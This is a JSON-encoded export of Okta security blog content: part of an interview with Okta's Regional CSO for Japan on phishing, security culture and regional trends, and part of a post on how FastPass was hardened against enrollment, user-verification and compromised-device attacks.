Okta is used by many customers in Japan, and the greatest reward of pursuing a career at Okta is that by securing Okta, we contribute to protecting the businesses of our many customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How has your previous experience shaped your approach to cybersecurity today?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I have worked in the identity security field in a variety of positions, not only as a product vendor, but also as a security officer at a user company, as a consultant at a partner company, and as an engineer at a system integrator. Attackers may attempt to exploit gaps in normal processes, such as emergency recovery processes or exception processes for executives. My real-world experience in a variety of roles has helped me to think realistically about which business processes are vulnerable and what countermeasures can be taken.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Are there any existing or emerging threats of particular interest to you?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I continue to be concerned about phishing attacks. As I mentioned earlier, there are many incidents related to credentials, and phishing using email and SMS is still being used as a way to steal credentials. And, with the development of AI technology, it is becoming more difficult for humans to detect. 
In addition to system-based measures such as passwordless authentication and DMARC, it is necessary to take a wide range of measures, including user education and reviewing business processes.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recently, I have also been paying more attention to cyber attacks resulting from geopolitical risks, such as the MirrorFace cyber attack. This year, the Osaka-Kansai Japan Expo 2025 will be held, and such international events increase the risk of being targeted by cyber attacks, so I am also vigilant about threats related to this.\\n\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From your perspective, what is the impact of cybersecurity awareness in today’s organizations?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"No matter how much you invest in system protection, if the security culture is weak, there will be risk. Of course education and training are important, but it is also important to have a system for evaluating security awareness. In addition, security is often neglected because of concerns that it could put the brakes on business speed. 
It is necessary for the management team to themselves place importance on security and to propagate it as a corporate culture.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As the methods used in phishing and social engineering become more and more sophisticated, it will also be important to create a relationship where people feel psychologically safe to report any suspicions they may have.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What are your thoughts on automated intelligence, or AI, in cybersecurity?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The democratization of AI technology has lowered the cost of carrying out attacks. It is becoming increasingly difficult to visually determine whether something is fake, such as advanced deep fakes. I believe that defenders also need to use AI technology to create a system that can automatically and timely detect and repair attacks while implementing multilayered defence.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What trends are you seeing in cybersecurity relating to your region?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Japan has a distinctive organizational structure, way of working and underlying way of thinking, and this gives rise to issues and responses that are specific to Japan.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For example, Japan's traditional employment system is known as the ‘membership type’, and rather than honing specific expertise, employees are expected to take on a variety of tasks based on the premise of lifetime 
employment. In other words, they are committed to the company itself. For this reason, in many cases, security expertise is heavily dependent on external resources such as SIers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, in light of the growing importance of security in recent years, there has been an increase in the number of cases where companies are hiring external security experts as full-time employees. As a result of global business expansion and management integration, many companies are now faced with the common challenge of determining what organizational structure and mechanisms they should use to ensure security across the entire supply chain and implement governance across the entire corporate group, while also having to collaborate with members not only in Japan but also overseas.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Additionally, identity verification using Individual Number cards is becoming increasingly common and is a topic unique to Japan that has been gaining discussion in recent years.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is the most significant change you’ve seen in the cybersecurity industry in your career to-date?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The concept of Zero Trust has emerged. I think that the emphasis on implicit relationships of trust is also a characteristic of Japan. With the diversification of working styles and the globalization of business, and with reports of actual damage, the idea that attacks are inevitable has gradually become more widespread, and I think it is now gaining considerable support. 
Many companies have yet to fully consider measures against internal crime, but I think that taking measures will also protect employees, so I would like to focus on this.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How do you employ \",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/04/the-story-behind-oktas-values/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s corporate values\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in your day to day?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In Japan, Okta products are delivered via partners, so I consider that our customers include both end users and partners, and I\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" “Love our customers.”\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I feel rewarded by the fact that I can build trusting relationships and communicate with various customer CISOs etc, with the responsibility of being the only Japanese person on the Okta’s security team. 
My biggest mission is to properly understand what issues Japanese customers have, and to reflect this in the activities of the global security team.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/oktane-2024-announcements/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Oktane24\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" brought numerous exciting announcements, which are you most looking forward to?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I’m looking forward to IPSIE, the Interoperability Profiling for Secure Identity in the Enterprise - improving industry standards is one of the pillars of the Okta Secure Identity Commitment (OSIC.) By promoting standards together with various technology companies, I hope that not only Okta but the entire industry will become a safer society.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you could provide a few short cybersecurity words of wisdom to Okta customers, what would they be?\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"I feel it is a shame not to leverage higher assurance options that can be used without requiring much additional cost or effort. 
For example, since you are already using Okta I recommend for you to make the most of the options that can enhance security, such as FastPass and the migration from Okta Classic to the Okta Identity Engine, or OIE.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nKeiko was recently interviewed by \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://scan.netsecurity.ne.jp/article/2025/01/20/52186.html\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"ScanNetSecurity\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on why she joined Okta as Japan’s Regional CSO and her mindset to fulfill her mission. She was also featured by \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://enterprisezine.jp/article/detail/20716\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"EnterpriseZine\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for a profile piece on her career in Identity management and her vision for its future in the Japan region. 
Keiko also shared insights as a speaker at the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://fidoalliance.org/content-2024-fido-alliance-seoul-public-seminar-unlocking-a-secure-tomorrow-with-passkeys/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"2024 Fido Alliance Seoul Public Seminar\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and at the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://authenticatecon.com/event/authenticate-2024-conference/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Authenticate 2024 Conference.\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"CSO Conversations is a blog series interviewing Okta’s Regional CSOs supporting David Bradbury, Okta’s Chief Security Officer in providing the best service for our customers. Okta’s Regional CSOs are integral to Okta’s Security Trust and Culture team, building and strengthening trusted advisor relationships with global security thought leadership."},"updatedAt":"2025-02-12T19:43:03.415Z","secAuthor":[{"id":"69fdea2c-e94b-5579-916f-c112d6e0926e","bio":{"bio":"<p> Keiko Itakura supports Okta’s Japan region by providing customers and prospects with security program assurance and best practice advisories. Keiko brings approximately 20 years of experience in the Information Technology space including Microsoft Japan, IBM and the Rakuten Group, at various levels with a key focus on security and Identity management. 
Keiko’s downtime is often spent watching sports, driving or spending quality time with her dog.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3ms5EsNFQvq2m8TJSk2xdF/f08f008a8efb8b07829c639a391172b7/Keiko_Itakura.png"},"name":"Keiko Itakura","jobTitle":"Regional CSO, Japan","slug":"/hackers/keiko-itakura","node_locale":"en"}]},{"slug":"/fastpasshardening","id":"e78d0de2-8569-5025-9251-9bca33a4d374","title":"FastPass: The battle-hardened authenticator","date":"2024-08-08T01:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has experienced strong growth in the enterprise market, with many customers drawn to the promise of protecting their workforce with phishing-resistant authentication. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass is the fastest growing authentication method in  Okta Workforce Identity. Our goal is for FastPass to be the most secure, usable, and deployable enterprise authenticator, and we are committed to maintaining a leadership position in protecting against the evolving threat landscape. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass delivers a simple passwordless user experience, including zero or one-touch biometric authentication on all major operating system platforms. 
Okta secures this experience with device-bound, phishing-resistant authentication and device posture enforcement.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As more organizations go passwordless, Okta FastPass has benefited from the research of red teams commissioned by these customers to put the claimed security properties of FastPass to the test. Okta has also benefited from testing conducted by hundreds of researchers via a public bug bounty program. The Okta Verify client has been in scope for rewards for several years, with the FastPass method added in October 2023.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One of the reasons Okta offers public bug bounties is because very often, security research is a driver of product innovation. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In this blog post, we summarize close to two years of FastPass innovations, many of which were driven by internal reviews conducted by Okta’s internal Product Security team, testing conducted by customer red teams, and from independent security researchers contributing to Okta’s public bug bounty programs.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The goal throughout this journey has been to narrow the range of opportunities for an adversary that targets a user protected by FastPass.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Most research falls into one of the following categories: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bypassing 
Enforcement of Phishing Resistance;\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Attacking Factor Enrollment and Recovery;\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bypassing User Verification;\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Local Attacks on a Previously Compromised Device.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bypassing Phishing Resistance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The most popular phishing-resistant method of user sign-in requires an authenticator that won’t issue credentials to any other site than a trusted origin established during user enrollment. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using Okta FastPass, a user’s credential is cryptographically bound to a specific Okta Org (tenant). This binding mitigates the most common means by which user credentials get stolen: when users are tricked into sharing them via a malicious phishing site or some other form of social engineering. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As this \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/11/a-deep-dive-into-okta-fastpass/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"2022 deep dive\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on Okta FastPass explains, the methods (or probing schemes) by which any given operating system (Android, iOS, macOS and Windows) can support phishing resistance vary. Okta’s first engineering challenge was how to deliver a consistent, phishing-resistant experience on all four major OS platforms and browsers. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Some of the most useful early research into FastPass identified how an attacker might exploit scenarios in which a probing scheme that supports phishing resistance would fall back to a scheme that doesn’t. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To trigger these conditions, attackers typically required human interaction: that is, these conditions could only be exploited if the attacker first convinced a user to perform a desired action.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In response, Okta introduced a policy configuration option that would only allow authentication requests from phishing-resistant flows and deny all others (see below).  
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4ZHu7dFJjv0auR0sK7RL6y\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today, claims that phishing resistance can be “bypassed” tend to rely on a customer configuration in which phishing resistance is not enforced in policy. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Attacking Factor Enrollment and Recovery\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The phishing resistance offered by FastPass eliminates the threat posed by a huge range of credential-based attacks. Naturally, we have observed security research shift to targeting enrollment and recovery flows, where phishing resistance cannot as easily be guaranteed. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The fundamental problem to solve was that the methods by which most users would verify their identity before enrolling a phishing-resistant factor were not themselves phishing resistant. This could be described as a “chicken and egg” problem.  \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At first, Okta solved this by requiring two factors of authentication to verify a user identity before enrolling another factor. 
With this step in place, adversaries would need to achieve a lot within the space of a few minutes: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Convince a target to start (but not complete) a FastPass enrolment process, \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Convince the target to share their Okta credentials (or obtain credentials by other means, such as credential stuffing or phishing), \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Start their own FastPass enrollment (on an adversary device), and then \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Convince the target to accept a Push notification issued or share an OTP initiated by the attacker. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This set the bar for interaction with the target very high, but we could foresee scenarios in which voice calls or instant messaging services could be utilized to make the attack effective. Some customers used a combination of MFA enrolment policies and Workflows to account for these risks. 
Once again, ongoing security research drove Okta to further harden our enrollment process.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta administrators can now make use of several \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/authenticators/require-phishing-resistant-authenticator.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"phishing-resistant factor enrollment policy options\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". These include an ability to exclude low assurance factors from enrollment flows, or to require verification of a user’s identity via a phishing resistant factor before the user can enroll in any other new factor. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Additionally, organizations can now pre-enroll users in roaming FIDO2 security keys via \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/authenticators/onboard-with-preenrolled-yubikey.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s integration with Yubico\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and can also use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/eu/en-us/content/topics/end-user/ov-ios-add-acc-bluetooth.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"features in which FastPass can be installed on a new device\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" if it is within physical proximity of an existing registered device. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Bypassing User Verification\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One reason signing in with FastPass is so “fast” is because the cryptographic relationship between a user device and the Okta service established at enrollment counts as a possession factor in an authentication flow. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the user can efficiently verify their identity to the device using an inherence factor (biometric) or knowledge factor (device passcode or PIN), they can subsequently satisfy two passwordless factors in 2-3 seconds.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Distinct from the conversation about whether an authentication method is phishing resistant, we must also account for how the user validates their identity to their device. User verification checks protect against local attacks in which an adversary gains physical access to a target’s device. If, for example, a user in a shared office doesn’t lock their device, and leaves it unattended, there needs to be a means of preventing a colleague from accessing resources on the absent user's behalf from the unattended device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The focus for security researchers has been how to force a user verification process to fall back from a biometric challenge to a verification method an attacker could more easily defeat. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To account for this, Okta’s policy engine considers FastPass as only a single (possession) factor of authentication if a biometric check fails or is abandoned by the user.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta administrators can decide what methods of user verification meet their requirements for any given application. Authentication policies can be configured to require biometrics only, a choice of biometrics or PIN/passcodes, or to make user verification optional.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Local Attacks on Compromised Devices\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Over two years in the market, security research (and the ongoing efforts of Okta’s engineering teams) have effectively isolated opportunities to attack FastPass down to a final remaining category: the abuse of a FastPass from a malware-compromised user device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are many perspectives on what role an Identity Provider can play in this scenario. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To be clear: Okta is not an endpoint security company, meaning there are limits to what an authenticator can do in the context of a compromised device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The same applies to FIDO2 authenticators, which offer similar qualities as FastPass. 
The \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://fidoalliance.org/specs/common-specs/fido-security-ref-v2.1-rd-20210525.html#fido-security-assumptions\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"specifications for FIDO2\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (and its predecessors) state clearly that the security claims of phishing-resistant authentication should not be expected to withstand a malware-compromised host.  \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The applications involved in a FIDO operation can be relied on as “trustworthy agents of the user”, the alliance says, up until the point of malicious computation on the user’s device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"“Malicious code privileged at the level of the trusted computing base can always violate [FIDO 2 security properties]”.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Arguably, if your authentication method can isolate attacker opportunities down to the compromise of a user endpoint, defenders are winning! \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But that’s not to say we shouldn’t all aim higher. At Okta, we love a challenge. This is an area where, once again, our response to security research is driving innovation in Okta products. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today, Okta’s policy engine gives administrators the ability to restrict access to any given resource based on whether a device is registered, managed and/or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"demonstrating compliance with a security baseline\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the early days of testing these device management features, Okta’s internal testing revealed that a user with root access to a managed device could remove and transfer its non-hardware bound certificate to an unmanaged device. Similarly, session identifiers used to identify whether a mobile device was managed could also be accessed and replayed from an unmanaged device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Addressing these issues inspired several features that further expanded FastPass capabilities, including:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/device-assurance.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Device Assurance\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" checks for “jailbroken” or “rooted” devices. 
Today, Okta Identity Engine administrators can write policies that approve or deny access to a resource based on these checks. These checks are performed by FastPass.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"FastPass Silent Context Rechecks\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\", through which a user session is terminated if a user accesses an application from a new device mid-session (assuming device context is evaluated in the authentication policy for that app.)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our next challenge is to ensure that FastPass can’t be invoked by malware running in a user context on a device.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To date, Okta’s response has included:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"EDR/XDR Integrations\",\"marks\":[{\"type\":\"underline\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" allow FastPass to check the security posture of an endpoint as evaluated by the customer’s choice of endpoint security tools at the point of authentication. 
